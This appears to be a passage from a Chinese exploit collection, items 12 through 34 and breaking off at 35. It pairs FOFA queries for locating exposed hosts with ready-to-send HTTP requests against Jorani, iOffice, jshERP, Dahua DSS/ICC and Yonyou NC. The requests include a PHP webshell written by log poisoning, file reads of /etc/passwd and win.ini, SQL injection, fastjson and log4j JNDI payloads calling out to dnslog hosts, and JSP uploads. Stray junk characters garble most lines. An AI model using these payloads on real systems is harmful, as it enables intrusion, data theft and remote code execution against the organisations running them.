Cache-Control: no-cache' H4 u* P( l7 Z3 U: W' L
Upgrade-Insecure-Requests: 1
% q: A6 ?3 y+ `8 `User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36$ k% G; w% p5 \) o: c
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7- j% w. x/ a+ {/ {2 k: R5 B
Accept-Encoding: gzip, deflate- A8 A/ m* F6 b4 J8 q6 D# v8 J
Accept-Language: zh-CN,zh;q=0.9,en;q=0.83 y# p& s% ? z( X$ Y
Connection: close; s1 p% l4 q% W6 `( o
: j6 W' y( A6 T+ H) V9 @1 I
D! ?& [" v W
12. Jorani < 1.0.2 远程命令执行$ s4 I1 `8 G; r- e4 J3 K: e2 q
FOFA:title="Jorani"
8 ?( L2 f6 }) E" A* I/ Y% s- ]4 ?第一步先拿到cookie$ C1 R, a, @% e d% Z
GET /session/login HTTP/1.18 b$ Z* [# a/ h/ N$ ]% A
Host: 192.168.190.30% u4 R/ ^% |% }5 Y3 Q5 L0 H+ T3 \
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36* _- e0 f7 U, u( G: c( Y
Connection: close
4 P( C3 i: \6 [9 D( nAccept-Encoding: gzip
7 |8 m: H2 ]- p( x4 H" c) ^
3 ?7 |; b; A+ {+ w5 D9 ]. s/ ?9 k- P! R
响应中csrf_cookie_jorani用于后续请求
! T( y+ i9 p( jHTTP/1.1 200 OK
% ]& c5 e% ]: Z8 ?" ~Connection: close
& l6 V$ F* B# c& n- n, n9 bCache-Control: no-store, no-cache, must-revalidate
: J( m7 g+ _% _3 z5 L4 ^& cContent-Type: text/html; charset=UTF-8
& L: {% f5 q7 J* }4 TDate: Tue, 24 Oct 2023 09:34:28 GMT; z7 j( q, Q6 F2 M T
Expires: Thu, 19 Nov 1981 08:52:00 GMT3 I9 j6 ?* c( I# E0 n7 q
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT
# i, M: g) l( s+ S7 y- U' UPragma: no-cache
* s) X6 y$ {% |* t% |" _Server: Apache/2.4.54 (Debian)4 K4 }; x" x4 E/ T& `; i, w5 q
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
! i1 \3 e+ c R- o6 a, o; hSet-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly2 u' F( W( o8 p7 z6 \% j9 J
Vary: Accept-Encoding
* T1 }6 ]+ d( p: ?
, K2 _+ j0 m2 y3 C8 V& z. c5 p/ y. B# m7 W+ O; g& O& b: U7 e7 v0 h
POST请求,执行函数并进行base64编码* C, F1 g+ K+ u% ?
POST /session/login HTTP/1.15 U' o+ o5 ?! S/ y9 d; ~
Host: 192.168.190.30' `: p; m; |0 d0 A8 r
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
7 \0 ]4 \% b7 V q3 p2 mConnection: close
6 c' E& O/ S$ p _9 B$ E; vContent-Length: 252
% ?6 f% f$ O7 ]. a( ?7 MContent-Type: application/x-www-form-urlencoded
/ |+ Q1 A3 X0 _- ~* R2 x ^/ D% JCookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r0 a' ?2 B! r9 \. p( K, V& v. N
Accept-Encoding: gzip. X. n& F2 Z* m. D
$ X( l' f2 R) vcsrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor
( w, I0 @. P- R& }
/ L! N2 D# v5 j5 `1 u, {7 D n5 {1 ]+ P+ O# g
! g+ j( A1 H8 u* t+ |3 c8 M( H% ]4 f向靶场发送如下请求,执行id命令,请求头中的ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=是命令base64编码后的字符串- P8 U* `: p( l$ ?/ {5 {
GET /pages/view/log-2023-10-24 HTTP/1.1
7 X6 e+ @! C$ I$ o% fHost: 192.168.190.30
7 L1 O, Y u# S: E3 hUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.360 V+ }) F2 M- a# O/ L* C/ a r
Connection: close3 F1 ?1 [+ L4 g3 Z4 e( Y9 g
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r4 M/ O8 o+ F; s" ?7 }' N
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
/ j" P' o5 ? |X-REQUESTED-WITH: XMLHttpRequest6 q( E: i7 g" j5 h; A4 \
Accept-Encoding: gzip
; G& M7 Y m. C6 o$ l4 q [, Q/ U
, z; ?, J/ M& f+ H( M$ T) r; G$ X2 G* |
13. 红帆iOffice ioFileDown任意文件读取
2 Q' K& n/ ?! j' N* ~FOFA:app="红帆-ioffice"" O. f/ t0 H0 S/ `
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1
. i( S ?( o0 e8 hHost: x.x.x.x; m/ A/ E4 n0 J
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
, A) D9 K' \+ j& ?9 }# w9 c1 xConnection: close4 V& @4 b: u; H( z0 B$ _
Accept: */*3 V$ @0 p! B( j! a
Accept-Encoding: gzip
* ]3 g- D# \" N9 ~- V" x# n6 x5 Y T/ D8 L6 B- E- j! [$ f
" z o) i4 I2 x14. 华夏ERP(jshERP)敏感信息泄露1 C6 i4 H9 H, T" h0 V! V
FOFA:body="jshERP-boot"
8 s1 P2 o, |! ]; S& u$ G0 x泄露内容包括用户名密码$ C) G+ F/ b! h" B4 R' I" Z3 x
GET /jshERP-boot/user/getAllList;.ico HTTP/1.15 W) z4 m" m/ N
Host: x.x.x.x
) ~6 p1 G4 |4 _ s! [User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.369 H8 u9 J4 l/ A$ t8 D5 E: y
Connection: close8 \ Y' d+ A* [! a; s! B
Accept: */*5 `4 P/ |6 m4 M9 K1 B7 z
Accept-Language: en
, z- `- a9 j/ c$ N8 q# E5 U! q5 [Accept-Encoding: gzip' `9 K2 D& t- q3 L G7 O/ `
+ p8 b* q' x* y8 J0 o) E5 m$ \
@) I: [- j& p" u) D15. 华夏ERP getAllList信息泄露
( w0 [+ c# ]. I }# v* w8 i# b- @CVE-2024-04904 h9 o! e" v8 W7 L
FOFA:body="jshERP-boot". v2 J5 g+ {' O
泄露内容包括用户名密码
- Y3 G1 |# y+ jGET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1' M* G, {$ t+ f& Y8 p7 |: L; R' |+ l
Host: 192.168.40.130:100
1 f9 c ^& ~* ~+ r; ]! o* rUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36/ R+ [3 e6 x7 a3 j( x' X& S" v' |# ~: ?
Connection: close. \; c% G3 f) C$ T& c/ u4 [
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
3 z: d5 j- I& V% i& e2 {Accept-Language: en
& o1 z+ m: m+ b+ Y& zsec-ch-ua-platform: Windows1 j* j2 z, E3 P, ~8 G6 q# j4 g1 j
Accept-Encoding: gzip
6 ~' F& \( W5 F1 Y5 i( i5 _8 A5 a# G! s9 o5 u
1 L8 u) Z! ?6 ^$ X16. 红帆HFOffice医微云SQL注入
1 z: j( y/ U1 U6 j+ d" l5 fFOFA:title="HFOffice"
% m( J$ s3 R& @( a7 U) s# `8 Rpoc中调用函数计算1234的md5值
- Q. Z1 S/ G$ F6 @% @, e- ~! v9 hGET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.17 |/ a6 A: Y5 h. p( k0 T. X
Host: x.x.x.x
7 Y9 K' Z: b0 ^: `5 k! EUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.360 z; | ]# a+ t9 g) a$ r H
Connection: close% o/ N/ k0 w! P$ `! T, I9 r% _6 U
Accept: */*
% t$ {9 K1 P. D% z1 @Accept-Language: en
, M) t6 h& l. p( u# d" gAccept-Encoding: gzip
# |$ a K- d' J/ {! Z4 ~) v
. j3 p" Z" q) ? g5 t8 l( W8 V) C& n& o, { V$ t f* R
17. 大华 DSS itcBulletin SQL 注入1 @6 D2 a/ O8 g9 Z3 ?. I- L
FOFA:app="dahua-DSS"; ]/ f- q4 o% t
POST /portal/services/itcBulletin?wsdl HTTP/1.1
/ {8 o' C5 F. n/ aHost: x.x.x.x
6 \" u! e7 c( Y, I9 _. A0 TUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
& E% h) ^9 W$ `$ F) `Connection: close
! b/ K! y. v x3 l8 FContent-Length: 345/ K9 {0 N4 G, C* \) ^& D
Accept-Encoding: gzip
+ |/ q4 h! K. x) h9 p; J5 M' O* u, @, \
<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>7 T7 B5 m) \1 Q$ |. h$ Q0 P
<s11:Body>; Y2 w2 F5 b n0 d$ p( O
<ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
' f0 W0 @, Q/ W; @' s <netMarkings>
2 x7 n* x+ C! h: f/ @0 K% s @ (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
1 h5 \* l- O( A( F& c$ z" F* O$ p0 ~6 T </netMarkings>
# m% a# w2 z+ E5 x1 A$ r </ns1:deleteBulletin>
+ N) _1 x! X% R6 s9 f </s11:Body>
5 F6 _1 `% O, O( F7 R: h</s11:Envelope>) B0 S$ I4 l G5 b; W# L
; Y Z* G4 O( g. J0 f' `
6 o6 U! y4 e7 f( c1 Y- P
18. 大华 DSS 数字监控系统 user_edit.action 信息泄露
% ?0 `2 o+ M$ w+ ?FOFA:app="dahua-DSS"
+ J, F8 g' D; ]+ _) J4 }- EGET /admin/cascade_/user_edit.action?id=1 HTTP/1.1$ f/ q4 ?1 J1 y# T
Host: your-ip
/ K* l: O$ }& |6 QUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.361 p1 ?' }) F, g* `8 {
Accept-Encoding: gzip, deflate
' ]( B& x1 b5 h' c" z+ _8 s/ aAccept: */*& ~: X7 E H1 `. u: I
Connection: keep-alive
5 @9 F" k& p& B$ h4 Y2 I5 T. K
2 p" Q O6 O' q2 o' k7 `3 E; M8 Q& W1 \9 h) ~6 y7 j
, Y; t5 g/ j# H- W8 w19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入
) I, K) J* p$ m. ~9 {FOFA:app="dahua-DSS"5 ]3 ]8 g0 |1 e* \" I r
GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.16 Z: q9 L9 d) R* s6 h0 a
Host:1 z' x% ~. o# S# b7 ^- n6 H4 h4 P
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36! k" d. \; ^( ]) Z
Accept-Encoding: gzip, deflate
2 q; n% d5 W3 K1 y6 F# c$ c0 }Accept: */*9 H. C: b K& X' P. b
Connection: keep-alive1 b( i) T H& K) S9 r
8 K- ?& {" _& c- m3 j6 ^
0 o, P- N% k8 f4 V" L# v, y20. 大华ICC智能物联综合管理平台任意文件读取
# D) w2 ]" ~2 B% ]' I2 v5 h: F* \' eFOFA:body="*客户端会小于800*"
{6 P1 m) g/ {- [" _GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1& e* b& v% O' a' e0 l0 g" H
Host: x.x.x.x
1 a0 X9 m+ F5 w$ s' q+ S5 FUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36$ R7 }1 o$ t% W1 Z
Connection: close
/ q$ X9 R8 t, P% C' ZAccept: */*
% f( n. @" Q8 L, C1 Y) X1 uAccept-Language: en
{: x0 c- U* I5 t1 q1 A6 m5 YAccept-Encoding: gzip. ]4 J/ @/ m f2 q6 F ~
- M# S) j' D) X& {
$ ~; z# c0 |! T21. 大华ICC智能物联综合管理平台random远程代码执行* N. Q5 L1 _& ?9 [' L" M% d
FOFA:icon_hash="-1935899595"
- V! H4 p6 m* y1 y3 ?9 bPOST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1" a+ f/ ]5 R3 S( ~1 S* w, Q. ?
Host: x.x.x.x
4 }) H6 Y- A% v6 \& w8 y+ |8 qUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15- V/ L ^9 @- w# {8 D9 a
Content-Length: 161& @5 [( r3 N& [) _
Accept-Encoding: gzip' Y* ?7 Y, j) `/ e
Connection: close
& q2 ]3 j: Z' L6 V( K! xContent-Type: application/json;charset=utf-8- d, c6 m0 n$ T/ b1 [
8 B/ y6 r- P: e! U. i) B: l& }, @- T{
) c6 _, l: q5 h: V. V"a":{ _7 x) j' F8 r% i8 Q' P% }
"@type":"com.alibaba.fastjson.JSONObject",
1 s3 `$ i3 d" ?8 y) Q {"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}9 Z! W% h) O5 B i0 J: X W2 N% }
}""
# f6 B2 e$ ^! B9 c" r' u K/ D% b}8 j) w1 R0 J% J: T, b
* D, b5 x' ?) P. T6 t
% n, s. }: k6 i22. 大华ICC智能物联综合管理平台 log4j远程代码执行
- Z- E: {( D( V; t* q9 k- A+ ZFOFA:icon_hash="-1935899595"
3 [+ L' m7 w0 J# _3 ?/ w2 G7 DPOST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1
1 N# a' ~% X( o+ Z& H8 \ G& KHost: your-ip% ~) q5 Z: [& q5 | d. B; O* v+ o
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
# l) \) U# _( b2 Q( RContent-Type: application/json;charset=utf-8
- t. a P6 ]" R# G; M# ^8 d1 n$ @, W5 n
{) X7 t! l4 U0 G4 j+ ]6 C! Y
"loginName":"${jndi:ldap://dnslog}", m8 r |" }+ p0 ~5 r! A) p5 z
}+ h7 h- c; }. s3 z
' ~# u# U& B4 c" i0 ?
- }- \* S3 D$ r9 z: M
- [ ]" } }" J$ X! Q. t23. 大华ICC智能物联综合管理平台 fastjson远程代码执行* N! F, m. ?8 a6 A4 ?4 X
FOFA:icon_hash="-1935899595"
( r2 l- _9 i3 L, r' nPOST /evo-runs/v1.0/auths/sysusers/random HTTP/1.11 U9 R( n. W( Z# i1 O
Host: your-ip
$ e+ z9 q5 i$ w5 n7 V& {User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15% d- }9 t& o, w; ?. @
Content-Type: application/json;charset=utf-8
/ r2 J: d( M. m$ U! W7 b HAccept-Encoding: gzip* W+ e- t" L# S" j3 m1 I6 \ g, ~
Connection: close
1 B* k t) ~# X" Z) j+ P, Q4 R5 w9 b" [6 e
{4 U: Q q. [' i1 `& k9 y
"a":{
3 s0 E1 @) b# `/ p* L* q+ B "@type":"com.alibaba.fastjson.JSONObject",9 s- q( C* u& d+ Q7 f
{"@type":"java.net.URL","val":"http://DNSLOG"}
" r. v K8 V! r: N. L7 }) i }""6 ~8 h' }! d+ w$ |3 ]
}" w/ N: q" y; V( x; g
% W" ?8 {7 @ M& p/ U! ?# x+ B* K
, B1 _8 ^" L$ O, \4 L24. 用友NC 6.5 accept.jsp任意文件上传
& V. R, D; y+ s8 ?4 @' u' n* TFOFA:icon_hash="1085941792"! f2 ?% e4 q9 G$ T" ^. v8 {
POST /aim/equipmap/accept.jsp HTTP/1.1/ c U- i/ f- q4 \9 J/ P h
Host: x.x.x.x- j. \& i. M. `* ]" N5 Q% z
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
# u) `3 \; a$ IConnection: close U( }& F: L; y* Q! J' k
Content-Length: 449
: D( A6 p" f+ D8 z2 FAccept: */*
9 U9 Z7 {( F- {1 wAccept-Encoding: gzip
' G; u. M" n. b8 Q7 mContent-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
! v# ~& E$ L, c5 U0 @
6 r. s' o) F" i/ z-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc- d8 P3 ]1 B0 q# m; c
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
- b" p# E* f. [5 R# w3 @5 D1 bContent-Type: text/plain
# l: C" I' U# o/ [+ a$ B6 w
4 y3 z b6 L7 A/ D7 D% v4 ?' A<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>" ^# i' A* N/ f$ K& ~
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc! S: Q) e6 X) l; Z
Content-Disposition: form-data; name="fname"9 r' H( W: |$ w$ O& a
# h W8 U4 W+ s) ?) W
\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp! g4 k" m% X4 y' J S
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--6 m5 l( _: N6 V8 P- X7 `
3 n) l1 i( N0 g/ F
+ _# w9 H" J. W- u% T3 r
25. 用友NC registerServlet JNDI 远程代码执行
3 a& A- A6 I) Q& F& [) I/ MFOFA:app="用友-UFIDA-NC"7 p1 k( @ w' J' \! t( D
POST /portal/registerServlet HTTP/1.1% W9 q% Y* I0 x& B% n: p" s
Host: your-ip1 d: l6 H$ ]# F' s& C
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0: {6 S3 u' B& h& D. }' L+ v
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9
6 h8 b. a( G8 O% X, qAccept-Encoding: gzip, deflate+ ~7 {- [7 n. P, u9 r, v
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
; y/ M& q% G2 P* TContent-Type: application/x-www-form-urlencoded
6 f$ H1 z7 m7 o* r4 e; C4 Q- [) G" a) ~- u) ?* j- Y
type=1&dsname=ldap://dnslog
! J/ e' F) o0 X* A! C: Y" w! L B: L6 V4 U7 k8 E j; u) X
& M# p A9 S# ~( _4 }+ R+ a, X
( j9 T! R- P2 k% q; }26. 用友NC linkVoucher SQL注入
- Z6 N7 L! W8 k+ |8 x/ f+ mFOFA:app="用友-UFIDA-NC"4 s8 _( | D- L( m
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1! N; U( V6 H" U7 _: ]5 @% s
Host: your-ip. B0 l4 w1 g& ~8 [
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.362 N( x, H2 v$ G R) i* q. R
Content-Type: application/x-www-form-urlencoded4 y9 W$ Y. D+ N" V) w t
Accept-Encoding: gzip, deflate$ D# H% U: Q8 [' |& {
Accept: */*
1 L [9 _+ W; \. MConnection: keep-alive( ~& B6 h- P' }( p; u
: o2 o+ x: k B7 T! M
3 l2 ?& C, c! X
27. 用友 NC showcontent SQL注入& K" d: V4 ], Z4 x' t2 I5 h5 ?+ S1 m2 A
FOFA:icon_hash="1085941792"
) x* b/ v4 i) ?* e* X4 m: pGET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1. N" D& I% B; l6 {
Host: your-ip2 V) C9 f, h# E: B- s& [ f( x7 A
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.361 E% @) e6 ~, z% `* x/ L
Accept-Encoding: identity1 M" q: `4 u& n* t7 v# X. ^/ B
Connection: close
# S4 W0 H1 `7 J( V7 EContent-Type: text/xml; charset=utf-81 j' d3 X/ H- V
3 c4 c$ q$ z8 N4 o" w! T+ B
( ^2 T2 }. ]" s5 P# _28. 用友NC grouptemplet 任意文件上传
4 y7 b" s2 p% }$ H& FFOFA:icon_hash="1085941792"
& P( ] F3 A. B, N8 ]/ c2 C5 iPOST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.11 e# N8 e. \" W2 ?$ f4 e1 R
Host: x.x.x.x
9 ^! o) P6 [/ F" Z0 j+ PUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
5 I, |5 h- e. oConnection: close
0 E( f; A7 P( o. }Content-Length: 268
' g7 O) @0 n/ T) VContent-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk' Y8 _/ p x1 C; E7 i) p' w
Accept-Encoding: gzip
4 \5 ]2 F! Q( [2 Y$ {. _1 j3 x2 \. _+ P( T' y
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
; C7 I' \) [ }1 vContent-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"
, N* P( k& j5 C B$ o$ a0 Z/ g( KContent-Type: application/octet-stream1 @4 l G/ q' M4 m4 ]
/ [- \; J* p) H* @% O3 `1 w4 v
<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>. @+ H% d8 W: \9 T4 |, v
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--* D" }' ~/ T! C4 Q9 ]+ `! ?( v& Y
, x& z* p2 B a. D" p; r8 m
- V8 h' L+ c( M2 {" u( d2 D/uapim/static/pages/nc/head.jsp9 h* J6 C% S9 M4 |# H" ~. r5 f! z) _
+ l0 H E6 ~/ f0 U
29. 用友NC down/bill SQL注入" n2 ^/ g+ D) e/ | O: @
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"9 s7 d8 v2 v' g' }" t) t' Z
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
# |4 I8 y+ }0 {0 xHost: your-ip% r/ m1 N0 {2 ~$ S& Y6 ^
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
+ C% X) R7 S3 C" [7 s/ g# sContent-Type: application/x-www-form-urlencoded+ a+ L" }8 l* r2 V! Z, c
Accept-Encoding: gzip, deflate
- D0 u/ G% L* X7 S+ f- B7 F% xAccept: */*
1 D7 b) J/ Y. Q) aConnection: keep-alive
6 ^0 `+ u) y4 T5 \
7 C, v4 D; I# e' }0 `
- k/ x( F9 m9 l8 h' C% S3 Y) i30. 用友NC importPml SQL注入
) o4 R& F, Z" A' Y5 sFOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
+ A! }, }5 K1 ZPOST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.18 k% \3 y: ^4 {- l
Host: your-ip. B, x# A- x, r! {. P
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V" v; B& ^7 u- |5 q: i& i
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
$ U) k9 @1 y6 D; S7 V5 V& B; ?3 PConnection: close0 h( D8 j- i8 Y, u( r7 H" `
9 p4 n; x+ P$ f) G4 `------WebKitFormBoundaryH970hbttBhoCyj9V! U- x+ M# m$ n0 L4 T+ M
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"
% Z% Z2 o) V Q) J9 }* p6 DContent-Type: image/jpeg
f, E e5 p! {------WebKitFormBoundaryH970hbttBhoCyj9V--
2 r; s$ F4 [- y! U7 {. }6 b o5 H! N
4 P0 N5 e9 N7 K+ y% ?31. 用友NC runStateServlet SQL注入
4 c5 x( K( @% X4 q, V9 a+ h8 s- i7 I1 sversion<=6.5+ C3 k: D, ?, x; F
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
2 b2 |4 P3 A, G" z1 HGET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1' d1 d9 {$ a& d* P$ ?
Host: host7 X: [& I, @4 Y1 X* v
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36: p) W3 }4 @5 n; V8 c, s. S
Content-Type: application/x-www-form-urlencoded! S: g( n* z$ }1 U. Z3 i3 E) ]. `
5 q& V& X* C9 k5 D' y
) H: P" K( D& @+ y& v& C32. 用友NC complainbilldetail SQL注入( B) ~7 ^) v0 C, N
version= NC633、NC65. a6 O- Q6 L1 Z- d- D
FOFA:app="用友-UFIDA-NC"; ]3 D: N4 r6 D& Q% l
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
0 o6 V$ c( m9 ~+ K) ZHost: your-ip
6 {. _$ p+ l6 _3 g' cUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36. s% B8 w9 _8 R! v) e5 v( W9 V3 m
Content-Type: application/x-www-form-urlencoded! q! I2 L2 r# [ t( q
Accept-Encoding: gzip, deflate
- f' [6 K) W8 N; VAccept: */*
) z% q& u* y5 i3 r# sConnection: keep-alive& g8 z8 F% H F$ x3 R4 M
, Z V% h6 P" M* y3 q1 ?/ {# l/ v; W1 ^4 V: a
33. 用友NC downTax/download SQL注入
. H" Y9 Y, ]$ F5 eversion:NC6.5FOFA:app="用友-UFIDA-NC"
- K0 f8 |( M4 b/ P' b. n$ {$ P) B, [3 cGET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
7 ~2 k# m) g) e1 D" s' n5 mHost: your-ip
' ^; m2 J: e' P* SUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.369 m: A" ]& R8 J2 Q: t' M
Content-Type: application/x-www-form-urlencoded
3 N8 G' h( J$ K8 b3 NAccept-Encoding: gzip, deflate
( w1 p. H$ G( r8 [8 KAccept: */*
9 k1 h4 R0 o5 |- GConnection: keep-alive! e6 i" h+ H0 Q% ?
: q s& ?3 d6 `5 y: D0 Z+ C0 I% `6 Z# e/ T
, b- f1 Q) t* C: W1 ^8 n/ M34. 用友NC warningDetailInfo接口SQL注入
* T$ O2 J9 G- AFOFA:app="用友-UFIDA-NC"
( O1 n: q+ Q9 B0 |6 d' d2 {GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1) {$ w7 {: R9 R, R7 U
Host: your-ip; q) l& F( q7 |+ h) I
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
) D2 T( G) n' k! [. T) |4 I1 CContent-Type: application/x-www-form-urlencoded
0 ]+ p; {- d& s7 O2 AAccept-Encoding: gzip, deflate
' H! c% q4 s9 y2 wAccept: */*7 X/ l- h) i1 Z$ J) g/ b
Connection: keep-alive
9 }* q' c- L1 T7 b- Z5 w
2 A9 ~1 G N5 a. X ?3 b0 c& [. p9 D5 Z: u8 ~
35. 用友NC-Cloud importhttpscer任意文件上传
